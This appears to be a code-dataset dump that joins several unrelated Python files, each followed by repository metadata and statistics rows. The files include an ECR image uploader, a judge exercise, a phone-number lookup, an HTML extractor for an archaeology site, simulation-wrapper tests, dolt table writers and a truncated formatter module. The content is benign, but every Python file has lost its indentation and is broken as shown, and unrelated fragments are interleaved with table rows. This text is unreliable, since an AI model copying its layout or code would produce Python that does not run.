index = {m.name: m for m in tf.getmembers()}
with tf.extractfile(index["manifest.json"]) as f:
layers = list(parse_original_manifest(f))
manifest = json_dumps_canonical(
{
"schemaVersion": 2,
"config": {
"mediaType": "application/vnd.oci.image.config.v1+json",
"digest": layers[0]["digest"],
"size": index[layers[0]["path"]].size,
},
"layers": [
{
"mediaType": "application/vnd.oci.image.layer.v1.tar",
"digest": layer["digest"],
"size": index[layer["path"]].size,
}
for layer in layers[1:]
],
}
)
manifest_digest = f"sha256:{hashlib.sha256(manifest).hexdigest()}"
response = await ecr.batch_get_image(
imageIds=[{"imageDigest": manifest_digest}],
)
if response["images"]:
return manifest_digest
missing_layers = await find_missing_layers(
ecr, [layer["digest"] for layer in layers]
)
async with trio.open_nursery() as nursery:
limit = trio.CapacityLimiter(args.upload_concurrency)
for layer in layers:
if layer["digest"] not in missing_layers:
continue
nursery.start_soon(
upload_file, ecr, limit, tf.extractfile(index[layer["path"]])
)
try:
await ecr.put_image(
imageManifest=manifest.decode("utf-8"),
imageManifestMediaType="application/vnd.oci.image.manifest.v1+json",
imageDigest=manifest_digest,
)
except ecr.exceptions.ImageAlreadyExistsException:
# pushed from another process running concurrently, maybe?
pass
return manifest_digest
def get_args(argv):
parser = argparse.ArgumentParser(f"{os.path.basename(sys.argv[0])} ecr")
parser.add_argument("source")
parser.add_argument(
"--format", choices=["nixpkgs-streamlayeredimage"], required=True
)
parser.add_argument("--repository-name", required=True)
parser.add_argument("--upload-concurrency", type=int, default=10)
return parser.parse_args(argv)
async def main(argv=None):
args = get_args(argv)
print(await upload_image(args))
| 35 | 88 | 0.553816 | 0 | 0 | 456 | 0.089237 | 0 | 0 | 3,974 | 0.777691 | 923 | 0.180626 |
17cfb7def19232ffc27b0f1860e91472d28ccd63 | 186 | py | Python | iniciante/1132.py | samucosta13/URI-Online-Judge | d3dc0c4c3ccf260e02cb3705a11226cbddffb90b | [
"MIT"
] | 2 | 2021-05-28T18:52:53.000Z | 2021-06-04T19:30:39.000Z | iniciante/1132.py | samucosta13/URI-Online-Judge | d3dc0c4c3ccf260e02cb3705a11226cbddffb90b | [
"MIT"
] | null | null | null | iniciante/1132.py | samucosta13/URI-Online-Judge | d3dc0c4c3ccf260e02cb3705a11226cbddffb90b | [
"MIT"
] | null | null | null | X = int(input())
Y = int(input())
soma = 0
if X > Y:
troca = Y
Y = X
X = troca
sam = X
while sam <= Y:
if sam%13 != 0:
soma = soma + sam
sam += 1
print(soma)
| 13.285714 | 25 | 0.462366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
17d0f29d3c45101f706a5d553869a8adc551e247 | 217 | py | Python | InformationSecurity/phone-number.py | eduardormonteiro/PythonPersonalLibrary | 561733bb8305c4e25a08f99c28b60ec77251ad67 | [
"MIT"
] | null | null | null | InformationSecurity/phone-number.py | eduardormonteiro/PythonPersonalLibrary | 561733bb8305c4e25a08f99c28b60ec77251ad67 | [
"MIT"
] | null | null | null | InformationSecurity/phone-number.py | eduardormonteiro/PythonPersonalLibrary | 561733bb8305c4e25a08f99c28b60ec77251ad67 | [
"MIT"
] | null | null | null | import phonenumbers
from phonenumbers import geocoder
phone = input('type phone number format(+551100000000): ')
phone_number = phonenumbers.parse(phone)
print(geocoder.description_for_number(phone_number, 'pt'))
| 21.7 | 58 | 0.801843 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 47 | 0.21659 |
17d3a82fb3f622128e484ca6ec7f7b9d2a13f56e | 20,307 | py | Python | src/extract_old_site/modules/standard_text_chapter.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | 1 | 2020-10-01T01:07:11.000Z | 2020-10-01T01:07:11.000Z | src/extract_old_site/modules/standard_text_chapter.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | null | null | null | src/extract_old_site/modules/standard_text_chapter.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
from pathlib import Path
import os
def extract_page_content(html_string, folder_path_str):
"""Extract contents of a page from a report*b.html file.
Parameters
----------
html_string : str
The HTML content of the report*b.html page to be extracted, as a str.
folder_path_str : str
Str indicating the current html str's parent folder within /dig/html.
Returns
-------
extracted_paragraphs : list
List of objects representing paragraphs, each with a type and content.
"""
soup = BeautifulSoup(html_string, 'html5lib')
folder_path = Path(folder_path_str)
extracted_paragraphs = []
# Replace all relative links in <a> tags with full ones to help generation
for a in soup.find_all('a'):
new_href = os.path.normpath(folder_path / a['href'])
new_href = Path(new_href).as_posix()
a['href'] = new_href
del a['target']
# Extract the page's paragraph contents
for content in soup.body.contents:
if isinstance(content, str) and content.strip() == '':
# Skip processing a '\n' character
pass
elif content.name == 'p':
inner_html = str(content).replace('<p>', '').replace('</p>', '')
if (inner_html.strip() == '' or inner_html == 'None'):
# Skip processing an empty <p> tag
pass
else:
p_contents = [
item
for item in content.contents
if str(item).strip() != ''
]
if len(p_contents) == 1 and p_contents[0].name == 'i':
# Paragraph tag contains a section title in italics
extracted_paragraphs.append({
'type': 'italic-title',
'content': str(p_contents[0].string)
})
else:
# Paragraph tag contains a normal paragraph and text.
# Newlines need to be removed during extraction.
lines = str(content).split('\n')
lines = [
line.replace('<p>', '').replace('</p>', '')
for line in lines
]
lines = [
line.replace(' ', ' ').strip() # Remove double spaces
for line in lines
if line.strip() != ''
]
p_inner_html = ' '.join(lines)
extracted_paragraphs.append({
'type': 'paragraph',
'content': p_inner_html
})
elif content.name == 'ul' or content.name == 'ol':
list_items = str(content) # Keep <ul> or <ol> tags
extracted_paragraphs.append({
'type': 'paragraph',
'content': list_items.strip()
})
elif content.name == 'table':
table = str(content) # Keep table as is, mainly for data downloads
extracted_paragraphs.append({
'type': 'paragraph',
'content': table.strip()
})
else:
# TODO
pass
return extracted_paragraphs
def extract_page_title(html_string):
"""Extract the page title from a report*a.html file.
Parameters
----------
html_string : str
The HTML content of the report*a.html page to be extracted, as a str.
Returns
-------
str
Page title as a string, without any HTML tags.
"""
soup = BeautifulSoup(html_string, 'html.parser')
return str(soup.body.center.i.string)
def extract_page_number(html_string):
"""Extract the page number from a report*c.html file.
Parameters
----------
html_string : str
The HTML content of the report*c.html page to be extracted, as a str.
Returns
-------
str
Page number as a string, to cover both Arabic and Roman numerals.
"""
soup = BeautifulSoup(html_string, 'html.parser')
return str(soup.body.center.string).replace('Page ', '')
def extract_sidebar(html_string, folder_path_str, parent_body_page_name):
"""Extract sidebar info from a "index*_*.html" file.
Parameters
----------
html_string : str
The HTML content of the index*_*.html page to be extracted, as a str.
folder_path_str : str
Str indicating the current html str's parent folder within /dig/html.
parent_body_page_name: str
The name of the body*_*.html page that loads this sidebar as a frame.
Returns
-------
dict
Dict with this sidebar's name, author, sections, and current section.
"""
# Note: because the original html content did not have any closing </p>
# tags, this function depends on using html5lib for proper parsing.
soup = BeautifulSoup(html_string, 'html5lib')
folder_path = Path(folder_path_str)
# Get lines/sections from the sidebar, which are contained in <p> tags
paragraphs = soup.body.find_all('p')
# Remove empty paragraphs
paragraphs = [
p
for p in paragraphs
if str(p).replace('<p>', '').replace('</p>', '').strip() != ''
]
# Use b directly, rather than b.string, to account for Getting Started,
# where the title may include an <i> tag and thus have no b.string.
current_module_full_name = (
str(paragraphs[0].b).replace("<b>", "")
.replace("</b>", "")
.strip()
)
moduleAuthor = None
sections = []
current_section = None
p_tag_with_sections = -1
if len(paragraphs) == 1:
# Deal with the edge case of the foreword in part 0
if paragraphs[0].find('br'):
moduleAuthor = (
str(paragraphs[0]).split('<br/>')[-1]
.split('<br>')[-1]
.replace('</p>', '')
.strip()
)
# If we aren't in the edge case of the foreword, then
# only the full module name is in this sidebar, no links or sections.
# Thus, create one section object to represent this one section.
# Note that this may lead to inconsistency between the names
# in report*a.html, tabs*.html, and this sidebar index*.html.
section_object = {
'name': current_module_full_name,
'path': (folder_path / parent_body_page_name).as_posix(),
'subsections': []
}
current_section = section_object
sections.append(section_object)
elif len(paragraphs) == 2:
# Check to see if it's a combination of the module title & author(s),
# or of the module title and section links.
if len(paragraphs[1].find_all('a')) == 0:
moduleAuthor = str(paragraphs[1].string).strip()
else:
p_tag_with_sections = 1
else:
moduleAuthor = str(paragraphs[1].string).strip()
p_tag_with_sections = 2
if p_tag_with_sections > 0:
links_contents = paragraphs[p_tag_with_sections].contents
i = 0
while i < len(links_contents) - 1:
section_object = None
content = links_contents[i]
if content.name == 'a':
section_object = {
'name': str(content.string).strip(),
'path': (folder_path / str(content['href'])).as_posix(),
'subsections': []
}
elif isinstance(content, str) and content.strip() != '':
# Then it's the link to the current page,
# without an <a> tag around it.
section_object = {
'name': str(content.string).strip(),
'path': (folder_path / parent_body_page_name).as_posix(),
'subsections': []
}
current_section = section_object
if section_object:
if (
i != 0 and
('\xa0' in links_contents[i-1] or '\xa0' in content)
):
# \xa0 is a non-breaking space, or in HTML.
# This covers both the case where there's an <a> tag around
# the title, and when it's the current page so there's no
# <a> tag. Relies on fact that no sidebar has more than
# three levels of links, i.e. subsections do not themselves
# have subsections.
sections[-1]['subsections'].append(section_object)
else:
sections.append(section_object)
i += 1
return {
'currentModuleFullName': current_module_full_name,
'moduleAuthor': moduleAuthor,
'sections': sections,
'currentSection': current_section
}
def extract_topbar(html_string, folder_path_str, parent_tab_page_name):
"""Extract info on the modules of a chapter from a tabs*.html file."""
soup = BeautifulSoup(html_string, 'html5lib')
folder_path = Path(folder_path_str)
links_contents = soup.body.b.contents
# Change the parent_tab_page_name so the extraction always uses the first
# page of a module (tab0.html, tab1.html, etc.), rather than pages like
# tab0_3.html, when recording the module's path.
part_nums = parent_tab_page_name.split('_')
if len(part_nums) > 1:
parent_tab_page_name = part_nums[0] + ".html"
modules = []
current_module = None
for element in links_contents:
if isinstance(element, str):
stripped_string = element.replace('|', '').strip()
if stripped_string != '':
# Is the current module, without a link to it
module_obj = {
'moduleShortName': stripped_string,
'path': (folder_path / parent_tab_page_name).as_posix()
}
modules.append(module_obj)
current_module = module_obj
elif element.name == 'a':
if 'index.html' in element['href'] or 'copyright.html' in element['href']:
pass
elif '/' in element['href']:
raise Exception('/ character found in hyperlink in the topbar of '
+ (folder_path / parent_tab_page_name).as_posix()
+ 'when it was not supposed to be.')
else:
modules.append({
'moduleShortName': str(element.string).strip(),
'path': (folder_path / element['href']).as_posix()
})
return {
"modules": modules,
"currentModule": current_module
}
def extract_frames(html_string, full_current_dir_path, readfile):
"""Read in data from the contained frames in a report#.html page."""
soup = BeautifulSoup(html_string, 'html.parser')
data = []
frames = soup.frameset.find_all(['frame'])
for frame in frames:
data.append(readfile(frame['src'], full_current_dir_path))
return data
def get_body_page_html_contents(html_string, current_dir_path, dig_parent_dir_path, readfile, has_page_num=True):
"""Extract all parts of a body*_*.html page and its contained frames.
Parameters
----------
html_string : str
Result of reading a body*_*.html file
current_dir_path : str
Directory of the body*_*.html file in Posix Path format
(e.g. "/dig/html/part2").
dig_parent_dir_path : Path
Containing directory of the /dig folder as a Path object, e.g.
if body0_1.html is found in "C:\\Users\\Dev\\dig\\html\\part2",
then dig_parent_dir_path is a WindowsPath('C:/Users/Dev').
readfile : function
Function to read any file based on the file name or folder path.
"""
soup = BeautifulSoup(html_string, 'html5lib')
frames = soup.find_all('frame')
full_current_dir_path = dig_parent_dir_path / ("." + current_dir_path)
sidebar_html_string = readfile(frames[0]['src'], full_current_dir_path)
report_html_string = readfile(frames[1]['src'], full_current_dir_path)
report_folder_path = (full_current_dir_path / frames[1]['src']).parent
report_abc_content = extract_frames(report_html_string, report_folder_path, readfile)
extracted_html_strs = {
'sidebar_html': sidebar_html_string,
'reporta_html': report_abc_content[0],
'reportb_html': report_abc_content[1]
}
if has_page_num:
extracted_html_strs['reportc_html'] = report_abc_content[2]
return extracted_html_strs
def get_tab_page_html_contents(html_string, current_dir_path, dig_parent_dir_path, readfile, has_page_num=True):
"""Extract all parts of a tab*.html or tab*_*.html page and its frames."""
soup = BeautifulSoup(html_string, 'html5lib')
frames = soup.find_all('frame')
full_current_dir_path = dig_parent_dir_path / ("." + current_dir_path)
topbar_html_string = readfile(frames[0]['src'], full_current_dir_path)
body_html_content = get_body_page_html_contents(
readfile(frames[1]['src'], full_current_dir_path),
current_dir_path,
dig_parent_dir_path,
readfile,
has_page_num=has_page_num
)
extracted_html_strs = {
'topbar_html': topbar_html_string,
'sidebar_html': body_html_content['sidebar_html'],
'reporta_html': body_html_content['reporta_html'],
'reportb_html': body_html_content['reportb_html'],
'body_page_name': frames[1]['src']
}
if has_page_num:
extracted_html_strs['reportc_html'] = body_html_content['reportc_html']
return extracted_html_strs
def process_tab_html_contents(
html_strings, current_tab_page_name,
current_dir_path, dig_parent_dir_path, readfile
):
"""Turn the raw html_strings from reading a tab.html file into a dict."""
title = extract_page_title(html_strings['reporta_html'])
content = extract_page_content(html_strings['reportb_html'], current_dir_path)
page_num = extract_page_number(html_strings['reportc_html'])
sidebar_info = extract_sidebar(html_strings['sidebar_html'],
current_dir_path,
html_strings['body_page_name'])
topbar_info = extract_topbar(html_strings['topbar_html'],
current_dir_path,
current_tab_page_name)
processed = {
"page": {
"parentModuleShortTitle": topbar_info['currentModule']['moduleShortName'],
"pageNum": page_num,
"pageTitle": title,
"content": content,
},
"module": {
"path": topbar_info['currentModule']['path'],
"shortTitle": topbar_info['currentModule']['moduleShortName'],
"fullTitle": sidebar_info['currentModuleFullName'],
"author": sidebar_info['moduleAuthor'],
"sections": sidebar_info['sections']
},
"additionalSectionInfo": {
"currentSection": sidebar_info['currentSection'],
"pageNum": page_num
}
}
return processed
def validate_tab_html_extraction_results(results):
baseline_module = results[0]['module']
noError = True
for result in results:
if not result['module'] == baseline_module:
print('Difference in these modules: \n'
+ str(result['module']) + '\n'
+ str(baseline_module))
noError = False
return noError
def extract_full_module(module_file_names, current_dir_path, dig_parent_dir_path, readfile):
"""Extract content from one module in a chapter and store in a dict."""
extracted = {
"module": {},
"pages": {}
}
full_current_dir_path = dig_parent_dir_path / ("." + current_dir_path)
processed_pages = []
for filename in module_file_names:
tab_html_str = readfile(filename, full_current_dir_path)
extracted_contents = get_tab_page_html_contents(tab_html_str, current_dir_path,
dig_parent_dir_path, readfile)
processed_page = process_tab_html_contents(extracted_contents, filename,
current_dir_path, dig_parent_dir_path, readfile)
processed_pages.append(processed_page)
if not validate_tab_html_extraction_results(processed_pages):
return "Failed: inconsistency in pages within module " + module_file_names[0]
sectionsToPageNums = {}
for processed_page in processed_pages:
sectionInfo = processed_page['additionalSectionInfo']
pageNumDictKey = (sectionInfo['currentSection']['path']
+ '-' + sectionInfo['currentSection']['name'])
if pageNumDictKey in sectionsToPageNums:
return "Failed: Two sections with the same path + name"
sectionsToPageNums[pageNumDictKey] = sectionInfo['pageNum']
extracted['module'] = processed_pages[0]['module']
for processed_page in processed_pages:
pageNum = processed_page['page'].pop('pageNum', None)
extracted['pages'][pageNum] = processed_page['page']
for section in extracted['module']['sections']:
section['pageNum'] = sectionsToPageNums[section['path'] + '-' + section['name']]
if len(section['subsections']) > 0:
for subsection in section['subsections']:
subsection['pageNum'] = sectionsToPageNums[subsection['path']
+ '-' + subsection['name']]
return extracted
def extract_full_chapter(
all_module_file_names, current_dir_path, dig_parent_path, readfile,
extract_full_module=extract_full_module
):
"""Extract an entire chapter by going through all tab*_*.html files."""
filenames = sorted(all_module_file_names)
module_start_tab_names = [filename for filename in filenames if "_" not in filename]
extracted = {
"path": current_dir_path,
"modules": [],
"pages": {}
}
# Sort so that the lowest numbered modules are extracted and added
# to the "modules" array first.
module_start_tab_names = sorted(module_start_tab_names)
for tab_name in module_start_tab_names:
current_module_file_names = [filename for filename in filenames
if tab_name.split('.')[0] in filename]
module_object = extract_full_module(current_module_file_names,
current_dir_path, dig_parent_path, readfile)
extracted['modules'].append(module_object)
for module in extracted['modules']:
pages = module.pop('pages')
for page_num, page_obj in pages.items():
extracted['pages'][page_num] = page_obj
return extracted
def extract_standard_part(part_folder_name, dig_parent_dir, readfile):
"""Extract an entire chapter based on folder name, e.g. /dig/html/part2."""
# Get all tab*.html or tab*_*.html files, which are starting points for
# the extraction process
folder_to_extract_full_path = Path(dig_parent_dir) / "./dig/html" / part_folder_name
tab_filenames = []
for filepath in folder_to_extract_full_path.iterdir():
if "tab" in filepath.name and "tabs" not in filepath.name:
tab_filenames.append(filepath.name)
return extract_full_chapter(tab_filenames,
"/dig/html/" + part_folder_name,
Path(dig_parent_dir),
readfile)
def reextract_title_page(part_0_data, dig_parent_dir, readfile):
"""Extract the actual title page from part 0 and put it in the dict."""
title_page_html_str = readfile("report0b.html", Path(dig_parent_dir) / "./dig/html/split")
soup = BeautifulSoup(title_page_html_str, 'html5lib')
part_0_data["pages"]["i"]["content"].append({
"type": "paragraph",
"content": str(soup.center)
})
return part_0_data
| 41.27439 | 113 | 0.594032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,810 | 0.335352 |
17d45564c73f2ece57a82cec5a50edaf47ded893 | 4,096 | py | Python | Pyrado/tests/environment_wrappers/test_action_delay.py | KhanhThiVo/SimuRLacra | fdeaf2059c2ed80ea696f018c29290510b5c4cb9 | [
"DOC",
"Zlib",
"BSD-3-Clause"
] | null | null | null | Pyrado/tests/environment_wrappers/test_action_delay.py | KhanhThiVo/SimuRLacra | fdeaf2059c2ed80ea696f018c29290510b5c4cb9 | [
"DOC",
"Zlib",
"BSD-3-Clause"
] | null | null | null | Pyrado/tests/environment_wrappers/test_action_delay.py | KhanhThiVo/SimuRLacra | fdeaf2059c2ed80ea696f018c29290510b5c4cb9 | [
"DOC",
"Zlib",
"BSD-3-Clause"
] | 1 | 2020-11-24T15:25:26.000Z | 2020-11-24T15:25:26.000Z | # Copyright (c) 2020, Fabio Muratore, Honda Research Institute Europe GmbH, and
# Technical University of Darmstadt.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of Fabio Muratore, Honda Research Institute Europe GmbH,
# or Technical University of Darmstadt, nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL FABIO MURATORE, HONDA RESEARCH INSTITUTE EUROPE GMBH,
# OR TECHNICAL UNIVERSITY OF DARMSTADT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import pytest
from pyrado.spaces.box import BoxSpace
from pyrado.environment_wrappers.action_delay import ActDelayWrapper
from tests.environment_wrappers.mock_env import MockEnv
@pytest.mark.wrapper
def test_no_delay():
mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
wenv = ActDelayWrapper(mockenv, delay=0)
# Reset to initialize buffer
wenv.reset()
# Perform some actions
wenv.step(np.array([4, 1]))
assert mockenv.last_act == [4, 1]
wenv.step(np.array([7, 5]))
assert mockenv.last_act == [7, 5]
@pytest.mark.wrapper
def test_act_delay():
mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
wenv = ActDelayWrapper(mockenv, delay=2)
# Reset to initialize buffer
wenv.reset()
# Perform some actions
wenv.step(np.array([0, 1]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([2, 4]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([1, 2]))
assert mockenv.last_act == [0, 1]
wenv.step(np.array([2, 3]))
assert mockenv.last_act == [2, 4]
@pytest.mark.wrapper
def test_reset():
mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
wenv = ActDelayWrapper(mockenv, delay=1)
# Reset to initialize buffer
wenv.reset()
# Perform some actions
wenv.step(np.array([0, 4]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([4, 4]))
assert mockenv.last_act == [0, 4]
# The next action would be [4, 4], but now we reset again
wenv.reset()
wenv.step(np.array([1, 2]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([2, 3]))
assert mockenv.last_act == [1, 2]
@pytest.mark.wrapper
def test_domain_param():
mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
wenv = ActDelayWrapper(mockenv, delay=1)
# Reset to initialize buffer
wenv.reset()
# Perform some actions
wenv.step(np.array([0, 1]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([2, 4]))
assert mockenv.last_act == [0, 1]
# change the delay and reset
wenv.domain_param = {"act_delay": 2}
wenv.reset()
wenv.step(np.array([1, 2]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([2, 3]))
assert mockenv.last_act == [0, 0]
wenv.step(np.array([8, 9]))
assert mockenv.last_act == [1, 2]
| 34.711864 | 86 | 0.703125 | 0 | 0 | 0 | 0 | 2,130 | 0.52002 | 0 | 0 | 2,024 | 0.494141 |
17d56bb81bb616a7c2df1a2ead640a65eb1314c9 | 870 | py | Python | firmware/uvc_controller/mbed-os/features/storage/filesystem/littlefs/TESTS/util/stats.py | davewhiiite/uvc | fd45223097eed5a824294db975b3c74aa5f5cc8f | [
"MIT"
] | 1 | 2021-06-12T14:54:07.000Z | 2021-06-12T14:54:07.000Z | firmware/uvc_controller/mbed-os/features/storage/filesystem/littlefsv2/TESTS/util/stats.py | davewhiiite/uvc | fd45223097eed5a824294db975b3c74aa5f5cc8f | [
"MIT"
] | null | null | null | firmware/uvc_controller/mbed-os/features/storage/filesystem/littlefsv2/TESTS/util/stats.py | davewhiiite/uvc | fd45223097eed5a824294db975b3c74aa5f5cc8f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import re
import sys
import subprocess
import os
def main(*args):
with open('main.cpp') as file:
tests = file.read()
cases = []
with open('template_all_names.txt') as file:
while True:
name = file.readline().strip('\n')
desc = file.readline().strip('\n')
if name == 'test_results':
break
cases.append((name, desc))
with open('template_wrapper.fmt') as file:
template = file.read()
with open('main.cpp', 'w') as file:
file.write(template.format(
tests=tests,
test_cases='\n'.join(
4*' '+'Case("{desc}", {name}),'.format(
name=name, desc=desc) for name, desc in cases)))
if __name__ == "__main__":
main(*sys.argv[1:])
| 25.588235 | 69 | 0.503448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 155 | 0.178161 |
17d66d7d5e69a7e3bc0a7835bb2e2711e3a0a57c | 6,093 | py | Python | doltpy/cli/write/write.py | jzcruiser/doltpy | e7dfa97c66fa405e1a1ead04228084eaf3c4b0b9 | [
"Apache-2.0"
] | null | null | null | doltpy/cli/write/write.py | jzcruiser/doltpy | e7dfa97c66fa405e1a1ead04228084eaf3c4b0b9 | [
"Apache-2.0"
] | null | null | null | doltpy/cli/write/write.py | jzcruiser/doltpy | e7dfa97c66fa405e1a1ead04228084eaf3c4b0b9 | [
"Apache-2.0"
] | null | null | null | import csv
import datetime
import io
import logging
import os
import tempfile
from typing import Any, Callable, List, Mapping, Optional, Set
import pandas as pd # type: ignore
from doltpy.cli import Dolt
from doltpy.shared.helpers import columns_to_rows
logger = logging.getLogger(__name__)
CREATE, FORCE_CREATE, REPLACE, UPDATE = "create", "force_create", "replace", "update"
IMPORT_MODES_TO_FLAGS = {
CREATE: ["-c"],
FORCE_CREATE: ["-f", "-c"],
REPLACE: ["-r"],
UPDATE: ["-u"],
}
def write_file(
dolt: Dolt,
table: str,
file_handle: io.StringIO,
# TODO what to do about this?
filetype: str = "csv",
import_mode: Optional[str] = None,
primary_key: Optional[List[str]] = None,
commit: Optional[bool] = False,
commit_message: Optional[str] = None,
commit_date: Optional[datetime.datetime] = None,
):
def writer(filepath: str):
with open(filepath, "w") as f:
f.writelines(file_handle.readlines())
_import_helper(
dolt=dolt,
table=table,
write_import_file=writer,
primary_key=primary_key,
import_mode=import_mode,
commit=commit,
commit_message=commit_message,
commit_date=commit_date,
)
def write_columns(
dolt: Dolt,
table: str,
columns: Mapping[str, List[Any]],
import_mode: Optional[str] = None,
primary_key: Optional[List[str]] = None,
commit: Optional[bool] = False,
commit_message: Optional[str] = None,
commit_date: Optional[datetime.datetime] = None,
):
"""
:param dolt:
:param table:
:param columns:
:param import_mode:
:param primary_key:
:param commit:
:param commit_message:
:param commit_date:
:return:
"""
def writer(filepath: str):
if len(list(set(len(col) for col in columns.values()))) != 1:
raise ValueError("Must pass columns of identical length")
with open(filepath, "w") as f:
csv_writer = csv.DictWriter(f, columns.keys())
rows = columns_to_rows(columns)
csv_writer.writeheader()
csv_writer.writerows(rows)
_import_helper(
dolt=dolt,
table=table,
write_import_file=writer,
primary_key=primary_key,
import_mode=import_mode,
commit=commit,
commit_message=commit_message,
commit_date=commit_date,
)
def write_rows(
dolt: Dolt,
table: str,
rows: List[dict],
import_mode: Optional[str] = None,
primary_key: Optional[List[str]] = None,
commit: Optional[bool] = False,
commit_message: Optional[str] = None,
commit_date: Optional[datetime.datetime] = None,
):
"""
:param dolt:
:param table:
:param rows:
:param import_mode:
:param primary_key:
:param commit:
:param commit_message:
:param commit_date:
:return:
"""
def writer(filepath: str):
with open(filepath, "w") as f:
fieldnames: Set[str] = set()
for row in rows:
fieldnames = fieldnames.union(set(row.keys()))
csv_writer = csv.DictWriter(f, fieldnames)
csv_writer.writeheader()
csv_writer.writerows(rows)
_import_helper(
dolt=dolt,
table=table,
write_import_file=writer,
primary_key=primary_key,
import_mode=import_mode,
commit=commit,
commit_message=commit_message,
commit_date=commit_date,
)
def write_pandas(
dolt: Dolt,
table: str,
df: pd.DataFrame,
import_mode: Optional[str] = None,
primary_key: Optional[List[str]] = None,
commit: Optional[bool] = False,
commit_message: Optional[str] = None,
commit_date: Optional[datetime.datetime] = None,
):
"""
:param dolt:
:param table:
:param df:
:param import_mode:
:param primary_key:
:param commit:
:param commit_message:
:param commit_date:
:return:
"""
def writer(filepath: str):
clean = df.dropna(subset=primary_key)
clean.to_csv(filepath, index=False)
_import_helper(
dolt=dolt,
table=table,
write_import_file=writer,
primary_key=primary_key,
import_mode=import_mode,
commit=commit,
commit_message=commit_message,
commit_date=commit_date,
)
def _import_helper(
dolt: Dolt,
table: str,
write_import_file: Callable[[str], None],
import_mode: Optional[str] = None,
primary_key: Optional[List[str]] = None,
commit: Optional[bool] = False,
commit_message: Optional[str] = None,
commit_date: Optional[datetime.datetime] = None,
) -> None:
import_mode = _get_import_mode_and_flags(dolt, table, import_mode)
logger.info(f"Importing to table {table} in dolt directory located in {dolt.repo_dir()}, import mode {import_mode}")
fname = tempfile.mktemp(suffix=".csv")
import_flags = IMPORT_MODES_TO_FLAGS[import_mode]
try:
write_import_file(fname)
args = ["table", "import", table] + import_flags
if primary_key:
args += ["--pk={}".format(",".join(primary_key))]
dolt.execute(args + [fname])
if commit:
msg = commit_message or f"Committing write to table {table} in {import_mode} mode"
dolt.add(table)
dolt.commit(msg, date=commit_date)
finally:
if os.path.exists(fname):
os.remove(fname)
def _get_import_mode_and_flags(dolt: Dolt, table: str, import_mode: Optional[str] = None) -> str:
import_modes = IMPORT_MODES_TO_FLAGS.keys()
if import_mode and import_mode not in import_modes:
raise ValueError(f"update_mode must be one of: {import_modes}")
else:
if table in [table.name for table in dolt.ls()]:
logger.info(f'No import mode specified, table exists, using "{UPDATE}"')
import_mode = UPDATE
else:
logger.info(f'No import mode specified, table exists, using "{CREATE}"')
import_mode = CREATE
return import_mode
| 26.84141 | 120 | 0.627934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,098 | 0.180207 |
17d686163c9068a2aa27ba7692b6a6104aee5c2a | 3,816 | py | Python | codeformatter/formatter.py | ephenyxshop/sublimetext-codeformatter | f4af5682b3e28d7ec0b450808bc0c0ad6b017fa9 | [
"MIT"
] | 676 | 2015-01-01T03:56:14.000Z | 2022-03-31T18:20:47.000Z | codeformatter/formatter.py | ephenyxshop/sublimetext-codeformatter | f4af5682b3e28d7ec0b450808bc0c0ad6b017fa9 | [
"MIT"
] | 331 | 2015-01-02T19:31:30.000Z | 2022-03-19T03:24:29.000Z | codeformatter/formatter.py | ephenyxshop/sublimetext-codeformatter | f4af5682b3e28d7ec0b450808bc0c0ad6b017fa9 | [
"MIT"
] | 196 | 2015-01-02T20:48:12.000Z | 2022-03-13T06:48:19.000Z | # @author Avtandil Kikabidze
# @copyright Copyright (c) 2008-2015, Avtandil Kikabidze aka LONGMAN (akalongman@gmail.com)
# @link http://longman.me
# @license The MIT License (MIT)
import os
import sys
import re
import sublime
directory = os.path.dirname(os.path.realpath(__file__))
libs_path = os.path.join(directory, 'lib')
if libs_path not in sys.path:
sys.path.append(libs_path)
try:
# Python 3
from .phpformatter import PhpFormatter
from .jsformatter import JsFormatter
